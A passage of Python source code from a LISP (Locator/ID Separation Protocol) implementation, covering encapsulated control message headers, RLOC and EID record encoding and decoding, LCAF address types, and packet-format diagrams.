#enddef
def decode(self, packet):
packet_format = "IBBHHH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
self.record_ttl, self.rloc_count, self.eid.mask_len, action, \
self.map_version, self.eid.afi = \
struct.unpack(packet_format, packet[:format_size])
self.record_ttl = socket.ntohl(self.record_ttl)
action = socket.ntohs(action)
self.action = (action >> 13) & 0x7
self.authoritative = True if ((action >> 12) & 1) else False
self.ddt_incomplete = True if ((action >> 11) & 1) else False
self.map_version = socket.ntohs(self.map_version)
self.signature_count = self.map_version >> 12
self.map_version = self.map_version & 0xfff
self.eid.afi = socket.ntohs(self.eid.afi)
self.eid.instance_id = 0
packet = packet[format_size::]
#
# Check if instance-ID LCAF is encoded in the EID-record.
#
if (self.eid.afi == LISP_AFI_LCAF):
packet, group = self.eid.lcaf_decode_eid(packet)
if (group): self.group = group
self.group.instance_id = self.eid.instance_id
return(packet)
#endif
packet = self.eid.unpack_address(packet)
return(packet)
#enddef
def print_eid_tuple(self):
return(lisp_print_eid_tuple(self.eid, self.group))
#enddef
#endclass
#
# Encapsualted Control Message Format
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# / | IPv4 or IPv6 Header |
# OH | (uses RLOC addresses) |
# \ | |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# / | Source Port = xxxx | Dest Port = 4342 |
# UDP +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# \ | UDP Length | UDP Checksum |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# LH |Type=8 |S|D|E|M| Reserved |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# / | IPv4 or IPv6 Header |
# IH | (uses RLOC or EID addresses) |
# \ | |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# / | Source Port = xxxx | Dest Port = yyyy |
# UDP +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# \ | UDP Length | UDP Checksum |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# LCM | LISP Control Message |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
LISP_UDP_PROTOCOL = 17
LISP_DEFAULT_ECM_TTL = 128
class lisp_ecm():
def __init__(self, sport):
self.security = False
self.ddt = False
self.to_etr = False
self.to_ms = False
self.length = 0
self.ttl = LISP_DEFAULT_ECM_TTL
self.protocol = LISP_UDP_PROTOCOL
self.ip_checksum = 0
self.source = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.dest = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.udp_sport = sport
self.udp_dport = LISP_CTRL_PORT
self.udp_checksum = 0
self.udp_length = 0
self.afi = LISP_AFI_NONE
#enddef
def print_ecm(self):
line = ("{} -> flags: {}{}{}{}, " + \
"inner IP: {} -> {}, inner UDP: {} -> {}")
lprint(line.format(bold("ECM", False), "S" if self.security else "s",
"D" if self.ddt else "d", "E" if self.to_etr else "e",
"M" if self.to_ms else "m",
green(self.source.print_address(), False),
green(self.dest.print_address(), False), self.udp_sport,
self.udp_dport))
def encode(self, packet, inner_source, inner_dest):
self.udp_length = len(packet) + 8
self.source = inner_source
self.dest = inner_dest
if (inner_dest.is_ipv4()):
self.afi = LISP_AFI_IPV4
self.length = self.udp_length + 20
#endif
if (inner_dest.is_ipv6()):
self.afi = LISP_AFI_IPV6
self.length = self.udp_length
#endif
#
# Encode ECM header first, then the IPv4 or IPv6 header, then the
# UDP header.
#
first_long = (LISP_ECM << 28)
if (self.security): first_long |= 0x08000000
if (self.ddt): first_long |= 0x04000000
if (self.to_etr): first_long |= 0x02000000
if (self.to_ms): first_long |= 0x01000000
ecm = struct.pack("I", socket.htonl(first_long))
ip = ""
if (self.afi == LISP_AFI_IPV4):
ip = struct.pack("BBHHHBBH", 0x45, 0, socket.htons(self.length),
0, 0, self.ttl, self.protocol, socket.htons(self.ip_checksum))
ip += self.source.pack_address()
ip += self.dest.pack_address()
ip = lisp_ip_checksum(ip)
#endif
if (self.afi == LISP_AFI_IPV6):
ip = struct.pack("BBHHBB", 0x60, 0, 0, socket.htons(self.length),
self.protocol, self.ttl)
ip += self.source.pack_address()
ip += self.dest.pack_address()
#endif
s = socket.htons(self.udp_sport)
d = socket.htons(self.udp_dport)
l = socket.htons(self.udp_length)
c = socket.htons(self.udp_checksum)
udp = struct.pack("HHHH", s, d, l, c)
return(ecm + ip + udp)
#enddef
def decode(self, packet):
#
# Decode ECM header.
#
packet_format = "I"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
first_long = struct.unpack(packet_format, packet[:format_size])
first_long = socket.ntohl(first_long[0])
self.security = True if (first_long & 0x08000000) else False
self.ddt = True if (first_long & 0x04000000) else False
self.to_etr = True if (first_long & 0x02000000) else False
self.to_ms = True if (first_long & 0x01000000) else False
packet = packet[format_size::]
#
# Decode inner IPv4/IPv6 and UDP header.
#
if (len(packet) < 1): return(None)
version = struct.unpack("B", packet[0:1])[0]
version = version >> 4
if (version == 4):
format_size = struct.calcsize("HHIBBH")
if (len(packet) < format_size): return(None)
x, l, x, t, p, c = struct.unpack("HHIBBH", packet[:format_size])
self.length = socket.ntohs(l)
self.ttl = t
self.protocol = p
self.ip_checksum = socket.ntohs(c)
self.source.afi = self.dest.afi = LISP_AFI_IPV4
#
# Zero out IPv4 header checksum.
#
p = struct.pack("H", 0)
offset1 = struct.calcsize("HHIBB")
offset2 = struct.calcsize("H")
packet = packet[:offset1] + p + packet[offset1+offset2:]
packet = packet[format_size::]
packet = self.source.unpack_address(packet)
if (packet == None): return(None)
packet = self.dest.unpack_address(packet)
if (packet == None): return(None)
#endif
if (version == 6):
format_size = struct.calcsize("IHBB")
if (len(packet) < format_size): return(None)
x, l, p, t = struct.unpack("IHBB", packet[:format_size])
self.length = socket.ntohs(l)
self.protocol = p
self.ttl = t
self.source.afi = self.dest.afi = LISP_AFI_IPV6
packet = packet[format_size::]
packet = self.source.unpack_address(packet)
if (packet == None): return(None)
packet = self.dest.unpack_address(packet)
if (packet == None): return(None)
#endif
self.source.mask_len = self.source.host_mask_len()
self.dest.mask_len = self.dest.host_mask_len()
format_size = struct.calcsize("HHHH")
if (len(packet) < format_size): return(None)
s, d, l, c = struct.unpack("HHHH", packet[:format_size])
self.udp_sport = socket.ntohs(s)
self.udp_dport = socket.ntohs(d)
self.udp_length = socket.ntohs(l)
self.udp_checksum = socket.ntohs(c)
packet = packet[format_size::]
return(packet)
#enddef
#endclass
#
# This is the structure of an RLOC record in a Map-Request, Map-Reply, and
# Map-Register's EID record.
#
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# /| Priority | Weight | M Priority | M Weight |
# L +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# o | Unused Flags |L|p|R| Loc-AFI |
# c +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# \| Locator |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# AFI-List LISP Canonical Address Format:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 16387 | Rsvd1 | Flags |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Type = 1 | Rsvd2 | 2 + 4 + 2 + 16 |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 1 | IPv4 Address ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | ... IPv4 Address | AFI = 2 |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | IPv6 Address ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | ... IPv6 Address ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | ... IPv6 Address ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | ... IPv6 Address |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# Geo Coordinate LISP Canonical Address Format:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 16387 | Rsvd1 | Flags |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Type = 5 | Rsvd2 | Length |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# |U|N|E|A|M|R|K| Reserved | Location Uncertainty |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Lat Degrees | Latitude Milliseconds |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Long Degrees | Longitude Milliseconds |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Altitude |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Radius | Reserved |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = x | Address ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# Explicit Locator Path (ELP) Canonical Address Format:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 16387 | Rsvd1 | Flags |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Type = 10 | Rsvd2 | n |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = x | Rsvd3 |L|P|S|
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Reencap Hop 1 ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = x | Rsvd3 |L|P|S|
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Reencap Hop k ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# Replication List Entry Address Format:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 16387 | Rsvd1 | Flags |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Type = 13 | Rsvd2 | 4 + n |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Rsvd3 | Rsvd4 | Level Value |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = x | RTR/ETR #1 ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 17 | RTR/ETR #1 RLOC Name ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Rsvd3 | Rsvd4 | Level Value |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = x | RTR/ETR #n ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 17 | RTR/ETR #n RLOC Name ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# Security Key Canonical Address Format:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 16387 | Rsvd1 | Flags |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Type = 11 | Rsvd2 | 6 + n |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Key Count | Rsvd3 |A| Cipher Suite| Rsvd4 |R|
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Key Length | Public Key Material ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | ... Public Key Material |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = x | Locator Address ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
class lisp_rloc_record():
def __init__(self):
self.priority = 0
self.weight = 0
self.mpriority = 0
self.mweight = 0
self.local_bit = False
self.probe_bit = False
self.reach_bit = False
self.rloc = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.geo = None
self.elp = None
self.rle = None
self.json = None
self.rloc_name = None
self.keys = None
#enddef
def print_rloc_name(self, cour=False):
if (self.rloc_name == None): return("")
rloc_name = self.rloc_name
if (cour): rloc_name = lisp_print_cour(rloc_name)
return('rloc-name: {}'.format(blue(rloc_name, cour)))
#enddef
def print_record(self, indent):
rloc_str = self.print_rloc_name()
if (rloc_str != ""): rloc_str = ", " + rloc_str
geo_str = ""
if (self.geo):
name = ""
if (self.geo.geo_name): name = "'{}' ".format(self.geo.geo_name)
geo_str = ", geo: {}{}".format(name, self.geo.print_geo())
#endif
elp_str = ""
if (self.elp):
name = ""
if (self.elp.elp_name): name = "'{}' ".format(self.elp.elp_name)
elp_str = ", elp: {}{}".format(name, self.elp.print_elp(True))
#endif
rle_str = ""
if (self.rle):
name = ""
if (self.rle.rle_name): name = "'{}' ".format(self.rle.rle_name)
rle_str = ", rle: {}{}".format(name, self.rle.print_rle(False))
#endif
json_str = ""
if (self.json):
name = ""
if (self.json.json_name):
name = "'{}' ".format(self.json.json_name)
#endif
json_str = ", json: {}".format(self.json.print_json(False))
#endif
sec_str = ""
if (self.rloc.is_null() == False and self.keys and self.keys[1]):
sec_str = ", " + self.keys[1].print_keys()
#endif
line = ("{}RLOC-record -> flags: {}, {}/{}/{}/{}, afi: {}, rloc: "
+ "{}{}{}{}{}{}{}")
lprint(line.format(indent, self.print_flags(), self.priority,
self.weight, self.mpriority, self.mweight, self.rloc.afi,
red(self.rloc.print_address_no_iid(), False), rloc_str, geo_str,
elp_str, rle_str, json_str, sec_str))
#enddef
def print_flags(self):
return("{}{}{}".format("L" if self.local_bit else "l", "P" \
if self.probe_bit else "p", "R" if self.reach_bit else "r"))
#enddef
def store_rloc_entry(self, rloc_entry):
rloc = rloc_entry.rloc if (rloc_entry.translated_rloc.is_null()) \
else rloc_entry.translated_rloc
self.rloc.copy_address(rloc)
if (rloc_entry.rloc_name):
self.rloc_name = rloc_entry.rloc_name
#endif
if (rloc_entry.geo):
self.geo = rloc_entry.geo
else:
name = rloc_entry.geo_name
if (name and lisp_geo_list.has_key(name)):
self.geo = lisp_geo_list[name]
#endif
#endif
if (rloc_entry.elp):
self.elp = rloc_entry.elp
else:
name = rloc_entry.elp_name
if (name and lisp_elp_list.has_key(name)):
self.elp = lisp_elp_list[name]
#endif
#endif
if (rloc_entry.rle):
self.rle = rloc_entry.rle
else:
name = rloc_entry.rle_name
if (name and lisp_rle_list.has_key(name)):
self.rle = lisp_rle_list[name]
#endif
#endif
if (rloc_entry.json):
self.json = rloc_entry.json
else:
name = rloc_entry.json_name
if (name and lisp_json_list.has_key(name)):
self.json = lisp_json_list[name]
#endif
#endif
self.priority = rloc_entry.priority
self.weight = rloc_entry.weight
self.mpriority = rloc_entry.mpriority
self.mweight = rloc_entry.mweight
#enddef
def encode_lcaf(self):
lcaf_afi = socket.htons(LISP_AFI_LCAF)
gpkt = ""
if (self.geo):
gpkt = self.geo.encode_geo()
#endif
epkt = ""
if (self.elp):
elp_recs = ""
for elp_node in self.elp.elp_nodes:
afi = socket.htons(elp_node.address.afi)
flags = 0
if (elp_node.eid): flags |= 0x4
if (elp_node.probe): flags |= 0x2
if (elp_node.strict): flags |= 0x1
flags = socket.htons(flags)
elp_recs += struct.pack("HH", flags, afi)
elp_recs += elp_node.address.pack_address()
#endfor
elp_len = socket.htons(len(elp_recs))
epkt = struct.pack("HBBBBH", lcaf_afi, 0, 0, LISP_LCAF_ELP_TYPE,
0, elp_len)
epkt += elp_recs
#endif
rpkt = ""
if (self.rle):
rle_recs = ""
for rle_node in self.rle.rle_nodes:
afi = socket.htons(rle_node.address.afi)
rle_recs += struct.pack("HBBH", 0, 0, rle_node.level, afi)
rle_recs += rle_node.address.pack_address()
if (rle_node.rloc_name):
rle_recs += struct.pack("H", socket.htons(LISP_AFI_NAME))
rle_recs += rle_node.rloc_name + "\0"
#endif
#endfor
rle_len = socket.htons(len(rle_recs))
rpkt = struct.pack("HBBBBH", lcaf_afi, 0, 0, LISP_LCAF_RLE_TYPE,
0, rle_len)
rpkt += rle_recs
#endif
jpkt = ""
if (self.json):
lcaf_len = socket.htons(len(self.json.json_string) + 2)
json_len = socket.htons(len(self.json.json_string))
jpkt = struct.pack("HBBBBHH", lcaf_afi, 0, 0, LISP_LCAF_JSON_TYPE,
0, lcaf_len, json_len)
jpkt += self.json.json_string
jpkt += struct.pack("H", 0)
#endif
spkt = ""
if (self.rloc.is_null() == False and self.keys and self.keys[1]):
spkt = self.keys[1].encode_lcaf(self.rloc)
#endif
npkt = ""
if (self.rloc_name):
npkt += struct.pack("H", socket.htons(LISP_AFI_NAME))
npkt += self.rloc_name + "\0"
#endif
apkt_len = len(gpkt) + len(epkt) + len(rpkt) + len(spkt) + 2 + \
len(jpkt) + self.rloc.addr_length() + len(npkt)
apkt_len = socket.htons(apkt_len)
apkt = struct.pack("HBBBBHH", lcaf_afi, 0, 0, LISP_LCAF_AFI_LIST_TYPE,
0, apkt_len, socket.htons(self.rloc.afi))
apkt += self.rloc.pack_address()
return(apkt + npkt + gpkt + epkt + rpkt + spkt + jpkt)
#enddef
def encode(self):
flags = 0
if (self.local_bit): flags |= 0x0004
if (self.probe_bit): flags |= 0x0002
if (self.reach_bit): flags |= 0x0001
packet = struct.pack("BBBBHH", self.priority, self.weight,
self.mpriority, self.mweight, socket.htons(flags),
socket.htons(self.rloc.afi))
if (self.geo or self.elp or self.rle or self.keys or self.rloc_name \
or self.json):
packet = packet[0:-2] + self.encode_lcaf()
else:
packet += self.rloc.pack_address()
#endif
return(packet)
#enddef
def decode_lcaf(self, packet, nonce):
packet_format = "HBBBBH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
afi, rsvd1, flags, lcaf_type, rsvd2, lcaf_len = \
struct.unpack(packet_format, packet[:format_size])
lcaf_len = socket.ntohs(lcaf_len)
packet = packet[format_size::]
if (lcaf_len > len(packet)): return(None)
#
# Process AFI-List LCAF.
#
if (lcaf_type == LISP_LCAF_AFI_LIST_TYPE):
while (lcaf_len > 0):
packet_format = "H"
format_size = struct.calcsize(packet_format)
if (lcaf_len < format_size): return(None)
packet_len = len(packet)
afi = struct.unpack(packet_format, packet[:format_size])[0]
afi = socket.ntohs(afi)
if (afi == LISP_AFI_LCAF):
packet = self.decode_lcaf(packet, nonce)
if (packet == None): return(None)
else:
packet = packet[format_size::]
self.rloc_name = None
if (afi == LISP_AFI_NAME):
packet, rloc_name = lisp_decode_dist_name(packet)
self.rloc_name = rloc_name
else:
self.rloc.afi = afi
packet = self.rloc.unpack_address(packet)
if (packet == None): return(None)
self.rloc.mask_len = self.rloc.host_mask_len()
#endif
#endif
lcaf_len -= packet_len - len(packet)
#endwhile
elif (lcaf_type == LISP_LCAF_GEO_COORD_TYPE):
#
# Process Geo-Coordinate LCAF.
#
geo = lisp_geo("")
packet = geo.decode_geo(packet, lcaf_len, rsvd2)
if (packet == None): return(None)
self.geo = geo
elif (lcaf_type == LISP_LCAF_JSON_TYPE):
#
# Process JSON LCAF.
#
packet_format = "H"
format_size = struct.calcsize(packet_format)
if (lcaf_len < format_size): return(None)
json_len = struct.unpack(packet_format, packet[:format_size])[0]
json_len = socket.ntohs(json_len)
if (lcaf_len < format_size + json_len): return(None)
packet = packet[format_size::]
self.json = lisp_json("", packet[0:json_len])
packet = packet[json_len::]
elif (lcaf_type == LISP_LCAF_ELP_TYPE):
#
# Process ELP LCAF.
#
elp = lisp_elp(None)
elp.elp_nodes = []
while (lcaf_len > 0):
flags, afi = struct.unpack("HH", packet[:4])
afi = socket.ntohs(afi)
if (afi == LISP_AFI_LCAF): return(None)
elp_node = lisp_elp_node()
elp.elp_nodes.append(elp_node)
flags = socket.ntohs(flags)
elp_node.eid = (flags & 0x4)
elp_node.probe = (flags & 0x2)
elp_node.strict = (flags & 0x1)
elp_node.address.afi = afi
elp_node.address.mask_len = elp_node.address.host_mask_len()
packet = elp_node.address.unpack_address(packet[4::])
lcaf_len -= elp_node.address.addr_length() + 4
#endwhile
elp.select_elp_node()
self.elp = elp
elif (lcaf_type == LISP_LCAF_RLE_TYPE):
#
# Process RLE LCAF.
#
rle = lisp_rle(None)
rle.rle_nodes = []
while (lcaf_len > 0):
x, y, level, afi = struct.unpack("HBBH", packet[:6])
afi = socket.ntohs(afi)
if (afi == LISP_AFI_LCAF): return(None)
rle_node = lisp_rle_node()
rle.rle_nodes.append(rle_node)
rle_node.level = level
rle_node.address.afi = afi
rle_node.address.mask_len = rle_node.address.host_mask_len()
packet = rle_node.address.unpack_address(packet[6::])
lcaf_len -= rle_node.address.addr_length() + 6
if (lcaf_len >= 2):
afi = struct.unpack("H", packet[:2])[0]
if (socket.ntohs(afi) == LISP_AFI_NAME):
packet = packet[2::]
packet, rle_node.rloc_name = \
lisp_decode_dist_name(packet)
if (packet == None): return(None)
lcaf_len -= len(rle_node.rloc_name) + 1 + 2
#endif
#endif
#endwhile
self.rle = rle
self.rle.build_forwarding_list()
elif (lcaf_type == LISP_LCAF_SECURITY_TYPE):
#
# Get lisp_key() data structure so we can parse keys in the Map-
# Reply RLOC-record. Then get the RLOC address.
#
orig_packet = packet
decode_key = lisp_keys(1)
packet = decode_key.decode_lcaf(orig_packet, lcaf_len)
if (packet == None): return(None)
#
# Other side may not do ECDH.
#
cs_list = [LISP_CS_25519_CBC, LISP_CS_25519_CHACHA]
if (decode_key.cipher_suite in cs_list):
if (decode_key.cipher_suite == LISP_CS_25519_CBC):
key = lisp_keys(1, do_poly=False, do_chacha=False)
#endif
if (decode_key.cipher_suite == LISP_CS_25519_CHACHA):
key = lisp_keys(1, do_poly=True, do_chacha=True)
#endif
else:
key = lisp_keys(1, do_poly=False, do_chacha=False)
#endif
packet = key.decode_lcaf(orig_packet, lcaf_len)
if (packet == None): return(None)
if (len(packet) < 2): return(None)
afi = struct.unpack("H", packet[:2])[0]
self.rloc.afi = socket.ntohs(afi)
if (len(packet) < self.rloc.addr_length()): return(None)
packet = self.rloc.unpack_address(packet[2::])
if (packet == None): return(None)
self.rloc.mask_len = self.rloc.host_mask_len()
#
# Some RLOC records may not have RLOC addresses but other LCAF
# types. Don't process security keys because we need RLOC addresses
# to index into security data structures.
#
if (self.rloc.is_null()): return(packet)
rloc_name_str = self.rloc_name
if (rloc_name_str): rloc_name_str = blue(self.rloc_name, False)
#
# If we found no stored key, store the newly created lisp_keys()
# to the RLOC list if and only if a remote public-key was supplied
# in the Map-Reply.
#
stored_key = self.keys[1] if self.keys else None
if (stored_key == None):
if (key.remote_public_key == None):
string = bold("No remote encap-public-key supplied", False)
lprint(" {} for {}".format(string, rloc_name_str))
key = None
else:
string = bold("New encap-keying with new state", False)
lprint(" {} for {}".format(string, rloc_name_str))
key.compute_shared_key("encap")
#endif
#endif
#
# If we have stored-key, the other side received the local public
# key that is stored in variable 'stored_key'. If the remote side
# did not supply a public-key, it doesn't want to do lisp-crypto.
# If it did supply a public key, check to see if the same as
# last time, and if so, do nothing, else we do a rekeying.
#
if (stored_key):
if (key.remote_public_key == None):
key = None
remote = bold("Remote encap-unkeying occurred", False)
lprint(" {} for {}".format(remote, rloc_name_str))
elif (stored_key.compare_keys(key)):
key = stored_key
lprint(" Maintain stored encap-keys for {}".format( \
rloc_name_str))
else:
if (stored_key.remote_public_key == None):
string = "New encap-keying for existing state"
else:
string = "Remote encap-rekeying"
#endif
lprint(" {} for {}".format(bold(string, False),
rloc_name_str))
stored_key.remote_public_key = key.remote_public_key
stored_key.compute_shared_key("encap")
key = stored_key
#endif
#endif
self.keys = [None, key, None, None]
else:
#
# All other LCAFs we skip over and ignore.
#
packet = packet[lcaf_len::]
#endif
return(packet)
#enddef
def decode(self, packet, nonce):
packet_format = "BBBBHH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
self.priority, self.weight, self.mpriority, self.mweight, flags, \
afi = struct.unpack(packet_format, packet[:format_size])
flags = socket.ntohs(flags)
afi = socket.ntohs(afi)
self.local_bit = True if (flags & 0x0004) else False
self.probe_bit = True if (flags & 0x0002) else False
self.reach_bit = True if (flags & 0x0001) else False
if (afi == LISP_AFI_LCAF):
packet = packet[format_size-2::]
packet = self.decode_lcaf(packet, nonce)
else:
self.rloc.afi = afi
packet = packet[format_size::]
packet = self.rloc.unpack_address(packet)
#endif
self.rloc.mask_len = self.rloc.host_mask_len()
return(packet)
#enddef
def end_of_rlocs(self, packet, rloc_count):
for i in range(rloc_count):
packet = self.decode(packet, None)
if (packet == None): return(None)
#endfor
return(packet)
#enddef
#endclass
#
# Map-Referral Message Format
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# |Type=6 | Reserved | Record Count |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Nonce . . . |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | . . . Nonce |
# +-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | | Record TTL |
# | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# R | Referral Count| EID mask-len | ACT |A|I| Reserved |
